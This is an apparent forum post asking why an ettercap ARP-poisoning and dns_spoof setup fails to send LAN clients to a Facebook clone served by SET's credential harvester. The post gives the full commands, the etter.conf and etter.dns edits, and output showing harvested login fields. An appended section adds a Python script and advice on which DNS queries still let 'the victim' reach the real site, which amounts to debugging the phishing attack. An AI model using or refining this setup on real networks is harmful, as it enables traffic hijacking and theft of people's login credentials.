Distro: BT5 R3, VM: VMware

Hey guys. I've been testing Ettercap/SET on my own personal network and I've run into a problem: Ettercap doesn't seem to want to redirect the DNS spoof.

SET seems to be working great:

    Social-Engineering Attacks > Website Attack Vectors > Credential Harvester Attack Method > Site Cloner

Then I get prompted with:

    IP address for the POST back in Harvester/Tabnabbing

So I enter wlan0's IP address (192.168.1.4).

If I go on another computer on the network and navigate to http://192.168.1.4 it works great. It looks just like Facebook and it even displays the POST results:

    [*] WE GOT A HIT! Printing the output:
    POSSIBLE USERNAME FIELD FOUND: email=test
    POSSIBLE PASSWORD FIELD FOUND: pass=test

The issue I'm having is with ettercap. I'll walk you through the steps I did:

Then I verified that I changed ec_uid and ec_gid's values to 0, as well as removing the # before the redir lines under iptables:

    ec_uid = 0 # nobody is the default
    ec_gid = 0 # nobody is the default

    # if you use iptables:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

I went ahead and did the same thing for /usr/local/etc/etter.conf.

Next I cleared out the etter.dns file and put the following (/usr/local/share/ettercap/etter.dns):

    facebook.com A 192.168.1.4
    *.facebook.com A 192.168.1.4
    www.facebook.com PTR 192.168.1.4

Finally, I started ettercap:

    ettercap -T -q -i wlan0 -P dns_spoof -M arp // //

Whenever I try to navigate to facebook.com on a client in my network, it actually directs to Facebook's page (https://www.facebook.com) as opposed to my SET clone (192.168.1.4). I tried changing it from facebook to other sites as well and nothing seems to get ettercap to redirect traffic. Again though, if I navigate to 192.168.1.4 on a machine on the network, it WILL go to the SET clone page and work correctly.

I wanted to verify that I wasn't making any simple mistakes again, so I double-checked to make sure I was on the subnet (even though I knew I already was):

    arp-scan -interface wlan0 --localnet

    Interface: wlan0, datalink type: EN10MB (Ethernet)
    Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
    192.168.1.1 00 (Unknown)
    192.168.1.5 (Unknown) (DUP: 2)
    192.168.1.3 4 (Unknown) (DUP: 2)
    192.168.1.15 (Unknown) (DUP: 2)
    192.168.1.13 (Unknown) (DUP: 2)

I verified that all of the etter.conf and etter.dns files were correct and reflect what I posted. I even tried manually adding the gateway IP instead of just using // //, as well as using autoadd as opposed to dns_spoof:

    ettercap -Tqi wlan0 -M arp:remote // /192.168.1.1/ -P autoadd

    ettercap 0.7.4.1 copyright 2001-2011 ALoR & NaGA
    Listening on wlan0... (Ethernet)
    wlan0 -> XX:XX:XX:XX:XX:XX 192.168.1.4 255.255.255.0
    Privileges dropped to UID 0 GID 0...
    40 protocol dissectors
    55 ports monitored
    7587 mac vendor fingerprint
    1766 tcp OS fingerprint
    2183 known services
    Randomizing 255 hosts for scanning...
    Scanning the whole netmask for 255 hosts...
    * |==>| 100.00 %
    3 hosts added to the hosts list...
    ARP poisoning victims:
    GROUP 1 : ANY (all the hosts in the list)
    GROUP 2 : 192.168.1.1 XX:XX:XX:XX:XX:XX
    Starting Unified sniffing...
    Text only Interface activated...
    Hit 'h' for inline help
    Activating autoadd plugin...

Just like before, it's producing the same result. It's not performing an actual DNS spoof to any client on the network; however, if a client was to navigate to https://192.168.1.4 ("attacker") it works correctly. Any other ideas by chance? I've been trying to research this and doing different methods but I keep running into the same issue. Thanks guys, I really appreciate your time!
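A check worth doing before blaming ARP poisoning is to confirm that the etter.dns entries above actually cover the queries the client sends. The dns_spoof plugin only answers a query when a record of the same type matches the queried name, so a browser resolving the name via an AAAA query, or a name already cached on the client, never sees the spoofed answer, and a client that goes straight to https://www.facebook.com lands on port 443 of the clone, which SET's harvester is not serving on. The script below is an added example, not code from the original post or from ettercap: it parses an etter.dns-style file constructed to mirror the one posted and re-implements the plugin's name matching as I understand it (exact or glob-style `*` match, case-insensitive, with the record type required to match; only A and PTR are modelled, which is an assumption). Given a list of queries you saw on the wire, it reports which ones would be spoofed and which fall through to the real resolver.

```python
"""Simulate etter.dns matching for a list of DNS queries (added example).

Re-implements the name/type matching of ettercap's dns_spoof plugin as an
approximation (assumption): glob-style '*' matching via fnmatch, case-
insensitive names, and the record type must match. Only A and PTR records
are modelled. Not ettercap's own code.
"""
import fnmatch
import ipaddress

# Constructed etter.dns content mirroring the post (comments/blank lines allowed)
ETTER_DNS = """\
# records from the post
facebook.com        A   192.168.1.4
*.facebook.com      A   192.168.1.4
www.facebook.com    PTR 192.168.1.4   # reverse lookups for the clone's IP
"""

# Constructed sample of queries a client might send while loading the page
SAMPLE_QUERIES = [
    ("facebook.com", "A"),
    ("www.facebook.com", "A"),
    ("static.xx.fbcdn.net", "A"),        # CDN name, not covered by the entries
    ("www.facebook.com", "AAAA"),        # IPv6 lookup: no AAAA record in etter.dns
    ("4.1.168.192.in-addr.arpa", "PTR"),
]


def parse_etter_dns(text):
    """Return a list of (name, type, target); '#' starts a comment."""
    records = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) != 3:
            raise ValueError(f"malformed etter.dns line: {raw!r}")
        name, rtype, target = parts
        records.append((name.lower().rstrip("."), rtype.upper(), target))
    return records


def reverse_name_to_ip(qname):
    """'4.1.168.192.in-addr.arpa' -> '192.168.1.4'; None if not an IPv4 PTR name."""
    suffix = ".in-addr.arpa"
    q = qname.lower().rstrip(".")
    if not q.endswith(suffix):
        return None
    octets = q[: -len(suffix)].split(".")
    if len(octets) != 4:
        return None
    try:
        return str(ipaddress.IPv4Address(".".join(reversed(octets))))
    except ipaddress.AddressValueError:
        return None


def spoofed_answer(records, qname, qtype):
    """Return the spoofed answer for (qname, qtype), or None if the plugin stays silent."""
    q = qname.lower().rstrip(".")
    qtype = qtype.upper()
    for name, rtype, target in records:
        if rtype != qtype:
            continue  # an A entry never answers an AAAA (or any other) query
        if rtype == "A" and fnmatch.fnmatchcase(q, name):
            return target
        if rtype == "PTR":
            ip = reverse_name_to_ip(q)
            if ip is not None and ip == target:
                return name  # reverse lookup of the clone's IP yields the spoofed name
    return None


def classify_queries(records, queries):
    """Map each (qname, qtype) to its spoofed answer or None."""
    return {(n, t): spoofed_answer(records, n, t) for n, t in queries}


def main():
    records = parse_etter_dns(ETTER_DNS)
    for (qname, qtype), answer in classify_queries(records, SAMPLE_QUERIES).items():
        status = f"spoofed -> {answer}" if answer else "NOT spoofed (real resolver answers)"
        print(f"{qtype:5} {qname:30} {status}")


if __name__ == "__main__":
    main()
```

Feed it the names and types you actually see leaving the client (tcpdump on port 53 from the attacker box while the victim loads the page) rather than the sample list; any query that comes back "NOT spoofed" is a path by which the victim still reaches the real site.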